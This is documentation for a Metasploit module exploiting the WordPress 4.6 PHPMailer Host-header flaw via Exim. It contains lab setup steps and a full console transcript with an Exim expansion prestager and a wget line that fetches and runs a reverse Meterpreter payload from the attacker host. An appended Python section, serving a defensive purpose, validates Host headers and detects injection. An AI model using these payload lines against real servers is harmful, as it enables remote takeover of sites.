metasploit-gs/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
2017-05-16 14:48:12 -05:00
## Intro

This vuln has some caveats: you need WordPress 4.6 (or a release close to it) with Exim providing the sendmail(8) command. You do not need to install PHPMailer separately, as it is bundled with the WordPress install.

Thanks to WP's awesome practice of backporting the heck out of all their patches, we need to use a Git clone and check out the vulnerable release rather than a packaged download.

## Setup

This was tested on Ubuntu 15.04. YMMV.

  1. got root?
  2. `cd /var/www/html`
  3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
  4. `chown -R www-data:www-data wordpress-4.6`
  5. `cd wordpress-4.6`
  6. `git checkout 4.6`
  7. Set up a MySQL database for WordPress
  8. Install as normal

## Options

**VERBOSE**

If you'd like to see what requests are being sent, set this to true. You should see the Exim prestager commands being sent to the target.

## Usage

```
msf > use exploit/unix/webapp/wp_phpmailer_host_header
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run

[*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped.

meterpreter >
```
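The transcript above shows the prestager as Exim string-expansion syntax (`${run{...}}`, `${readsocket{...}}`, `$value`) that the module delivers through the HTTP Host header, which PHPMailer then passes to Exim's sendmail(8) interface. From the defending side, the useful observation is that a legitimate Host header is only ever a hostname or IP literal with an optional port, so a positive validity check catches this class of request without a per-exploit signature. The following Python is an added example written for this page, not code from the Metasploit module or WordPress: it parses raw HTTP requests, validates the Host header, and labels requests that carry expansion operators or otherwise malformed hosts. All sample requests, including the `wp-login.php?action=lostpassword` endpoint and the IPv6 literal, are constructed for the example.

```python
"""Flag HTTP requests whose Host header is not a syntactically valid host.

Added example, not part of the wp_phpmailer_host_header module or its docs.
The sample requests below are constructed for this example.
"""
import ipaddress
import re

# RFC 1123 hostname label: letters, digits and hyphens, 1-63 chars,
# not starting or ending with a hyphen. IPv4 literals match this too.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$", re.IGNORECASE)

# Exim string-expansion operators ("${run{", "${readsocket{", "$value", ...).
# A "$" never belongs in a Host header, so this is a strong indicator on its own.
EXIM_EXPANSION_RE = re.compile(r"\$\{|\$[a-z_]+", re.IGNORECASE)


def parse_host_header(raw_request: str):
    """Return the Host header value from a raw HTTP request, or None if absent."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip()
    return None


def is_valid_host(value: str) -> bool:
    """True for 'host', 'host:port', 'ipv4[:port]' or '[ipv6][:port]'."""
    if not value or len(value) > 259:            # 253-char name + ':65535'
        return False
    port = None
    if value.startswith("["):                    # bracketed IPv6 literal
        end = value.find("]")
        if end == -1:
            return False
        try:
            ipaddress.IPv6Address(value[1:end])
        except ValueError:
            return False
        rest = value[end + 1:]
        if rest:
            if not rest.startswith(":"):
                return False
            port = rest[1:]
    else:
        host, sep, maybe_port = value.partition(":")
        if sep:
            port = maybe_port
        if not HOSTNAME_RE.match(host):
            return False
    if port is not None:
        if not port.isdigit() or not 1 <= int(port) <= 65535:
            return False
    return True


def classify_request(raw_request: str) -> dict:
    """Label one request: ok, suspicious (malformed/missing host) or malicious."""
    host = parse_host_header(raw_request)
    if host is None:
        return {"host": None, "verdict": "suspicious", "reason": "missing-host"}
    if EXIM_EXPANSION_RE.search(host):
        return {"host": host, "verdict": "malicious", "reason": "exim-expansion"}
    if not is_valid_host(host):
        return {"host": host, "verdict": "suspicious", "reason": "invalid-host"}
    return {"host": host, "verdict": "ok", "reason": "valid-host"}


def scan(raw_requests):
    """Classify a batch of raw requests, preserving order."""
    return [classify_request(r) for r in raw_requests]


# Constructed sample traffic (not captured from any real host).
SAMPLE_REQUESTS = [
    # benign password-reset request with a plain IPv4 Host
    "POST /wordpress-4.6/wp-login.php?action=lostpassword HTTP/1.1\r\n"
    "Host: 192.168.33.135\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user_login=admin",
    # benign IPv6 literal with a port
    "GET /wordpress-4.6/ HTTP/1.1\r\nHost: [2001:db8::10]:8080\r\n\r\n",
    # Exim expansion operator in the Host header, the shape seen in the transcript
    "POST /wordpress-4.6/wp-login.php?action=lostpassword HTTP/1.1\r\n"
    "Host: ${run{/bin/echo}{x}}example.com\r\n\r\nuser_login=admin",
    # illegal character in the host, no expansion syntax
    "GET / HTTP/1.1\r\nHost: blog.example.com;id\r\n\r\n",
    # no Host header at all
    "GET / HTTP/1.0\r\nUser-Agent: curl/7.0\r\n\r\n",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(f"{result['verdict']:<10} {result['reason']:<15} {result['host']!r}")
```

The check is deliberately an allow-list (what a Host header may look like) rather than a deny-list of Exim tokens, so variations on the expansion syntax still fall into `invalid-host`; the `exim-expansion` label is only there to make triage faster. The same validation belongs in the application itself: the server-side fix for this bug class is to refuse a Host/SERVER_NAME value that is not a well-formed host before it reaches PHPMailer's Sender address.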